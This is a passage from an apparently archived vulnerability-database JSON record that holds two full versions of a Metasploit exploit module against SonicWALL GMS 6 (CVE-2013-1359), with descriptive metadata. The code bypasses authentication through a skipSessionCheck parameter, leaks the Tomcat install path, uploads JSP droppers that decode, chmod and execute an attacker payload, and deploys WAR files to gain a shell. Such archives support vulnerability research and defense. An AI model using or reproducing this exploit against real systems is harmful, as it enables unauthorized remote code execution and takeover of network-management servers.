'linux'\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jan 17 2012'))\r\n\r\n\t\tregister_options(\r\n\t\t\t[\r\n\t\t\t\tOpt::RPORT(80),\r\n\t\t\t\tOptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])\r\n\t\t\t], self.class)\r\n\tend\r\n\r\n\r\n\tdef on_new_session\r\n\t\t# on_new_session will force stdapi to load (for Linux meterpreter)\r\n\tend\r\n\r\n\r\n\tdef generate_jsp\r\n\t\tvar_hexpath = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_exepath = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_data = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_inputstream = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_outputstream = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_numbytes = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_bytearray = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_bytes = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_counter = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_char1 = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_char2 = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_comb = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_exe = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\t@var_hexfile = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_proc = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_fperm = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\t\tvar_fdel = Rex::Text.rand_text_alpha(rand(8)+8)\r\n\r\n\t\tjspraw = \"<%@ page import=\\\"java.io.*\\\" %>\\n\"\r\n\t\tjspraw << \"<%\\n\"\r\n\t\tjspraw << \"String #{var_hexpath} = application.getRealPath(\\\"/\\\") + \\\"/#{@var_hexfile}.txt\\\";\\n\"\r\n\t\tjspraw << \"String #{var_exepath} = System.getProperty(\\\"java.io.tmpdir\\\") + \\\"/#{var_exe}\\\";\\n\"\r\n\t\tjspraw << \"String #{var_data} = \\\"\\\";\\n\"\r\n\r\n\t\tjspraw << \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") != -1){\\n\"\r\n\t\tjspraw << \"#{var_exepath} = #{var_exepath}.concat(\\\".exe\\\");\\n\"\r\n\t\tjspraw << \"}\\n\"\r\n\r\n\t\tjspraw << \"FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\\n\"\r\n\t\tjspraw << \"FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\\n\"\r\n\r\n\t\tjspraw << \"int #{var_numbytes} = #{var_inputstream}.available();\\n\"\r\n\t\tjspraw << \"byte #{var_bytearray}[] = new byte[#{var_numbytes}];\\n\"\r\n\t\tjspraw << \"#{var_inputstream}.read(#{var_bytearray});\\n\"\r\n\t\tjspraw << \"#{var_inputstream}.close();\\n\"\r\n\r\n\t\tjspraw << \"byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\\n\"\r\n\t\tjspraw << \"for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\\n\"\r\n\t\tjspraw << \"{\\n\"\r\n\t\tjspraw << \"char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\\n\"\r\n\t\tjspraw << \"char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\\n\"\r\n\t\tjspraw << \"int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\\n\"\r\n\t\tjspraw << \"#{var_comb} <<= 4;\\n\"\r\n\t\tjspraw << \"#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\\n\"\r\n\t\tjspraw << \"#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\\n\"\r\n\t\tjspraw << \"}\\n\"\r\n\r\n\t\tjspraw << \"#{var_outputstream}.write(#{var_bytes});\\n\"\r\n\t\tjspraw << \"#{var_outputstream}.close();\\n\"\r\n\r\n\t\tjspraw << \"if (System.getProperty(\\\"os.name\\\").toLowerCase().indexOf(\\\"windows\\\") == -1){\\n\"\r\n\t\tjspraw << \"String[] #{var_fperm} = new String[3];\\n\"\r\n\t\tjspraw << \"#{var_fperm}[0] = \\\"chmod\\\";\\n\"\r\n\t\tjspraw << \"#{var_fperm}[1] = \\\"+x\\\";\\n\"\r\n\t\tjspraw << \"#{var_fperm}[2] = #{var_exepath};\\n\"\r\n\t\tjspraw << \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_fperm});\\n\"\r\n\t\tjspraw << \"if (#{var_proc}.waitFor() == 0) {\\n\"\r\n\t\tjspraw << \"#{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\"\r\n\t\tjspraw << \"}\\n\"\r\n\t\t# Linux and other UNICES allow removing files while they are in use...\r\n\t\tjspraw << \"File #{var_fdel} = new File(#{var_exepath}); #{var_fdel}.delete();\\n\"\r\n\t\tjspraw << \"} else {\\n\"\r\n\t\t# Windows does not ..\r\n\t\tjspraw << \"Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\\n\"\r\n\t\tjspraw << \"}\\n\"\r\n\r\n\t\tjspraw << \"%>\\n\"\r\n\t\treturn jspraw\r\n\tend\r\n\r\n\tdef get_install_path\r\n\t\tres = send_request_cgi(\r\n\t\t\t{\r\n\t\t\t\t'uri' => \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\",\r\n\t\t\t\t'method' => 'POST',\r\n\t\t\t\t'connection' => 'TE, close',\r\n\t\t\t\t'headers' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'TE' => \"deflate,gzip;q=0.3\",\r\n\t\t\t\t\t},\r\n\t\t\t\t'vars_post' => {\r\n\t\t\t\t\t'num' => '123456',\r\n\t\t\t\t\t'action' => 'show_diagnostics',\r\n\t\t\t\t\t'task' => 'search',\r\n\t\t\t\t\t'item' => 'application_log',\r\n\t\t\t\t\t'criteria' => '*.*',\r\n\t\t\t\t\t'width' => '500'\r\n\t\t\t\t}\r\n\t\t\t})\r\n\r\n\t\tif res and res.code == 200 and res.body =~ /VALUE=\"(.*)logs/\r\n\t\t\treturn $1\r\n\t\tend\r\n\r\n\t\treturn nil\r\n\tend\r\n\r\n\tdef upload_file(location, filename, contents)\r\n\t\tpost_data = Rex::MIME::Message.new\r\n\t\tpost_data.add_part(\"file_system\", nil, nil, \"form-data; name=\\\"action\\\"\")\r\n\t\tpost_data.add_part(\"uploadFile\", nil, nil, \"form-data; name=\\\"task\\\"\")\r\n\t\tpost_data.add_part(location, nil, nil, \"form-data; name=\\\"searchFolder\\\"\")\r\n\t\tpost_data.add_part(contents, \"application/octet-stream\", nil, \"form-data; name=\\\"uploadFilename\\\"; filename=\\\"#{filename}\\\"\")\r\n\r\n\t\tdata = post_data.to_s\r\n\t\tdata.gsub!(/\\r\\n\\r\\n--_Part/, \"\\r\\n--_Part\")\r\n\r\n\t\tres = send_request_cgi(\r\n\t\t\t{\r\n\t\t\t\t'uri' => \"#{@uri}appliance/applianceMainPage?skipSessionCheck=1\",\r\n\t\t\t\t'method' => 'POST',\r\n\t\t\t\t'data' => data,\r\n\t\t\t\t'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\r\n\t\t\t\t'headers' =>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\t'TE' => \"deflate,gzip;q=0.3\",\r\n\t\t\t\t\t},\r\n\t\t\t\t'connection' => 'TE, close'\r\n\t\t\t})\r\n\r\n\t\tif res and res.code == 200 and res.body.empty?\r\n\t\t\treturn true\r\n\t\telse\r\n\t\t\treturn false\r\n\t\tend\r\n\tend\r\n\r\n\tdef check\r\n\t\t@peer = \"#{rhost}:#{rport}\"\r\n\t\t@uri = normalize_uri(target_uri.path)\r\n\t\t@uri << '/' if @uri[-1,1] != '/'\r\n\r\n\t\tif get_install_path.nil?\r\n\t\t\treturn Exploit::CheckCode::Safe\r\n\t\tend\r\n\r\n\t\treturn Exploit::CheckCode::Vulnerable\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t@peer = \"#{rhost}:#{rport}\"\r\n\t\t@uri = normalize_uri(target_uri.path)\r\n\t\t@uri << '/' if @uri[-1,1] != '/'\r\n\r\n\t\t# Get Tomcat installation path\r\n\t\tprint_status(\"#{@peer} - Retrieving Tomcat installation path...\")\r\n\t\tinstall_path = get_install_path\r\n\r\n\t\tif install_path.nil?\r\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Unable to retrieve the Tomcat installation path\")\r\n\t\tend\r\n\r\n\t\tprint_good(\"#{@peer} - Tomcat installed on #{install_path}\")\r\n\r\n\t\tif target['Platform'] == \"linux\"\r\n\t\t\t@location = \"#{install_path}webapps/appliance/\"\r\n\t\telsif target['Platform'] == \"win\"\r\n\t\t\t@location = \"#{install_path}webapps\\\\appliance\\\\\"\r\n\t\tend\r\n\r\n\r\n\t\t# Upload the JSP and the raw payload\r\n\t\t@jsp_name = rand_text_alphanumeric(8+rand(8))\r\n\r\n\t\tjspraw = generate_jsp\r\n\r\n\t\t# Specify the payload in hex as an extra file..\r\n\t\tpayload_hex = payload.encoded_exe.unpack('H*')[0]\r\n\r\n\t\tprint_status(\"#{@peer} - Uploading the payload\")\r\n\r\n\t\tif upload_file(@location, \"#{@var_hexfile}.txt\", payload_hex)\r\n\t\t\tprint_good(\"#{@peer} - Payload successfully uploaded to #{@location}#{@var_hexfile}.txt\")\r\n\t\telse\r\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the Payload\")\r\n\t\tend\r\n\r\n\t\tprint_status(\"#{@peer} - Uploading the payload\")\r\n\r\n\t\tif upload_file(@location, \"#{@jsp_name}.jsp\", jspraw)\r\n\t\t\tprint_good(\"#{@peer} - JSP successfully uploaded to #{@location}#{@jsp_name}.jsp\")\r\n\t\telse\r\n\t\t\tfail_with(Exploit::Failure::NotVulnerable, \"#{@peer} - Error uploading the jsp\")\r\n\t\tend\r\n\r\n\t\tprint_status(\"Triggering payload at '#{@uri}#{@jsp_name}.jsp' ...\")\r\n\t\tres = send_request_cgi(\r\n\t\t\t{\r\n\t\t\t\t'uri' => \"#{@uri}appliance/#{@jsp_name}.jsp\",\r\n\t\t\t\t'method' => 'GET'\r\n\t\t\t})\r\n\r\n\t\tif res and res.code != 200\r\n\t\t\tprint_warning(\"#{@peer} - Error triggering the payload\")\r\n\t\tend\r\n\r\n\t\tregister_files_for_cleanup(\"#{@location}#{@var_hexfile}.txt\")\r\n\t\tregister_files_for_cleanup(\"#{@location}#{@jsp_name}.jsp\")\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://www.exploit-db.com/download/24322/"}], "metasploit": [{"lastseen": "2018-08-15T21:19:10", "_object_types": ["robots.models.base.Bulletin", "robots.models.metasploit.MetasploitBulletin"], "references": [], "description": "This module exploits a code execution flaw in SonicWALL GMS. It exploits two vulnerabilities in order to get its objective. An authentication bypass in the Web Administration interface allows to abuse the \"appliance\" application and upload an arbitrary payload embedded in a JSP. The module has been tested successfully on SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run successfully while testing, shell payload has been used.", "reporter": "Rapid7", "published": "2013-01-22T00:54:41", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/multi/http/sonicwall_gms_upload.rb", "type": "metasploit", "title": "SonicWALL GMS 6 Arbitrary File Upload", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2013-1359"], "_object_type": "robots.models.metasploit.MetasploitBulletin", "modified": "2017-08-29T00:17:58", "metasploitReliability": "Excellent", "id": "MSF:EXPLOIT/MULTI/HTTP/SONICWALL_GMS_UPLOAD", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n HttpFingerprint = { :pattern => [ /Apache-Coyote/ ] }\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SonicWALL GMS 6 Arbitrary File Upload',\n 'Description' => %q{\n This module exploits a code execution flaw in SonicWALL GMS. It exploits two\n vulnerabilities in order to get its objective. An authentication bypass in the\n Web Administration interface allows to abuse the \"appliance\" application and upload\n an arbitrary payload embedded in a JSP. The module has been tested successfully on\n SonicWALL GMS 6.0.6017 over Windows 2003 SP2 and SonicWALL GMS 6.0.6022 Virtual\n Appliance (Linux). On the Virtual Appliance the linux meterpreter hasn't run\n successfully while testing, shell payload has been used.\n },\n 'Author' =>\n [\n 'Nikolas Sotiriu', # Vulnerability Discovery\n 'Redsadic <julian.vilas[at]gmail.com>', # Metasploit module\n 'juan vazquez' # Metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2013-1359'],\n [ 'OSVDB', '89347' ],\n [ 'BID', '57445' ],\n [ 'EDB', '24204' ]\n ],\n 'Privileged' => true,\n 'Platform' => %w{ linux win },\n 'Targets' =>\n [\n [ 'SonicWALL GMS 6.0 Viewpoint / Java Universal',\n {\n 'Arch' => ARCH_JAVA,\n 'Platform' => 'java'\n }\n ],\n [ 'SonicWALL GMS 6.0 Viewpoint / Windows 2003 SP2',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'win'\n }\n ],\n [ 'SonicWALL GMS 6.0 Viewpoint Virtual Appliance (Linux)',\n {\n 'Arch' => ARCH_X86,\n 'Platform' => 'linux'\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jan 17 2012'))\n\n register_options(\n [\n Opt::RPORT(80),\n OptString.new('TARGETURI', [true, 'Path to SonicWall GMS', '/'])\n ])\n end\n\n\n def install_path\n return @install_path if @install_path\n\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path,\"appliance\",\"applianceMainPage\") + \"?skipSessionCheck=1\",\n 'method' => 'POST',\n 'connection' => 'TE, close',\n 'headers' =>\n {\n 'TE' => \"deflate,gzip;q=0.3\",\n },\n 'vars_post' => {\n 'num' => '123456',\n 'action' => 'show_diagnostics',\n 'task' => 'search',\n 'item' => 'application_log',\n 'criteria' => '*.*',\n 'width' => '500'\n }\n })\n\n @install_path = nil\n if res and res.code == 200 and res.body =~ /VALUE=\"(.*)logs/\n @install_path = $1\n end\n\n @install_path\n end\n\n def upload_file(location, filename, contents)\n post_data = Rex::MIME::Message.new\n post_data.add_part(\"file_system\", nil, nil, \"form-data; name=\\\"action\\\"\")\n post_data.add_part(\"uploadFile\", nil, nil, \"form-data; name=\\\"task\\\"\")\n post_data.add_part(location, nil, nil, \"form-data; name=\\\"searchFolder\\\"\")\n post_data.add_part(contents, \"application/octet-stream\", nil, \"form-data; name=\\\"uploadFilename\\\"; filename=\\\"#{filename}\\\"\")\n\n data = post_data.to_s\n\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, \"appliance\",\"applianceMainPage\") + \"?skipSessionCheck=1\",\n 'method' => 'POST',\n 'data' => data,\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\",\n 'headers' =>\n {\n 'TE' => \"deflate,gzip;q=0.3\",\n },\n 'connection' => 'TE, close'\n })\n register_files_for_cleanup(path_join(location, filename))\n\n if res and res.code == 200 and res.body.empty?\n return true\n else\n return false\n end\n end\n\n def upload_and_run_jsp(filename, contents)\n upload_file(path_join(install_path,\"webapps\",\"appliance\"), filename, contents)\n send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, \"appliance\", filename),\n 'method' => 'GET'\n })\n end\n\n def check\n if install_path.nil?\n return Exploit::CheckCode::Safe\n end\n\n if install_path.include?(\"\\\\\")\n vprint_status(\"Target looks like Windows\")\n else\n vprint_status(\"Target looks like Linux\")\n end\n return Exploit::CheckCode::Vulnerable\n end\n\n def exploit\n # Get Tomcat installation path\n print_status(\"Retrieving Tomcat installation path...\")\n\n if install_path.nil?\n fail_with(Failure::NotVulnerable, \"#{peer} - Unable to retrieve the Tomcat installation path\")\n end\n\n print_good(\"Tomcat installed on #{install_path}\")\n\n if target['Platform'] == \"java\"\n exploit_java\n else\n exploit_native\n end\n end\n\n def exploit_java\n print_status(\"Uploading WAR file\")\n app_base = rand_text_alphanumeric(4+rand(32-4))\n\n war = payload.encoded_war({ :app_name => app_base }).to_s\n war_filename = path_join(install_path, \"webapps\", \"#{app_base}.war\")\n\n register_files_for_cleanup(war_filename)\n\n dropper = jsp_drop_bin(war, war_filename)\n dropper_filename = Rex::Text.rand_text_alpha(8) + \".jsp\"\n\n upload_and_run_jsp(dropper_filename, dropper)\n\n 10.times do\n select(nil, nil, nil, 2)\n\n # Now make a request to trigger the newly deployed war\n print_status(\"Attempting to launch payload in deployed WAR...\")\n res = send_request_cgi(\n {\n 'uri' => normalize_uri(target_uri.path, app_base, Rex::Text.rand_text_alpha(rand(8)+8)),\n 'method' => 'GET'\n })\n # Failure. The request timed out or the server went away.\n break if res.nil?\n # Success! Triggered the payload, should have a shell incoming\n break if res.code == 200\n end\n end\n\n def exploit_native\n print_status(\"Uploading executable file\")\n exe = payload.encoded_exe\n exe_filename = path_join(install_path, Rex::Text.rand_text_alpha(8))\n if target['Platform'] == \"win\"\n exe << \".exe\"\n end\n\n register_files_for_cleanup(exe_filename)\n\n dropper = jsp_drop_and_execute(exe, exe_filename)\n dropper_filename = Rex::Text.rand_text_alpha(8) + \".jsp\"\n\n upload_and_run_jsp(dropper_filename, dropper)\n end\n\n def path_join(*paths)\n if install_path.include?(\"\\\\\")\n path = paths.join(\"\\\\\")\n path.gsub!(%r|\\\\+|, \"\\\\\\\\\\\\\\\\\")\n else\n path = paths.join(\"/\")\n path.gsub!(%r|//+|, \"/\")\n end\n\n path\n end\n\n # This should probably go in a mixin\n def jsp_drop_bin(bin_data, output_file)\n jspraw = %Q|<%@ page import=\"java.io.*\" %>\\n|\n jspraw << %Q|<%\\n|\n jspraw << %Q|String data = \"#{Rex::Text.to_hex(bin_data, \"\")}\";\\n|\n\n jspraw << %Q|FileOutputStream outputstream = new FileOutputStream(\"#{output_file}\");\\n|\n\n jspraw << %Q|int numbytes = data.length();\\n|\n\n jspraw << %Q|byte[] bytes = new byte[numbytes/2];\\n|\n jspraw << %Q|for (int counter = 0; counter < numbytes; counter += 2)\\n|\n jspraw << %Q|{\\n|\n jspraw << %Q| char char1 = (char) data.charAt(counter);\\n|\n jspraw << %Q| char char2 = (char) data.charAt(counter + 1);\\n|\n jspraw << %Q| int comb = Character.digit(char1, 16) & 0xff;\\n|\n jspraw << %Q| comb <<= 4;\\n|\n jspraw << %Q| comb += Character.digit(char2, 16) & 0xff;\\n|\n jspraw << %Q| bytes[counter/2] = (byte)comb;\\n|\n jspraw << %Q|}\\n|\n\n jspraw << %Q|outputstream.write(bytes);\\n|\n jspraw << %Q|outputstream.close();\\n|\n jspraw << %Q|%>\\n|\n\n jspraw\n end\n\n def jsp_execute_command(command)\n jspraw = %Q|<%@ page import=\"java.io.*\" %>\\n|\n jspraw << %Q|<%\\n|\n jspraw << %Q|try {\\n|\n jspraw << %Q| Runtime.getRuntime().exec(\"chmod +x #{command}\");\\n|\n jspraw << %Q|} catch (IOException ioe) { }\\n|\n jspraw << %Q|Runtime.getRuntime().exec(\"#{command}\");\\n|\n jspraw << %Q|%>\\n|\n\n jspraw\n end\n\n def jsp_drop_and_execute(bin_data, output_file)\n jsp_drop_bin(bin_data, output_file) + jsp_execute_command(output_file)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/sonicwall_gms_upload.rb"}]}
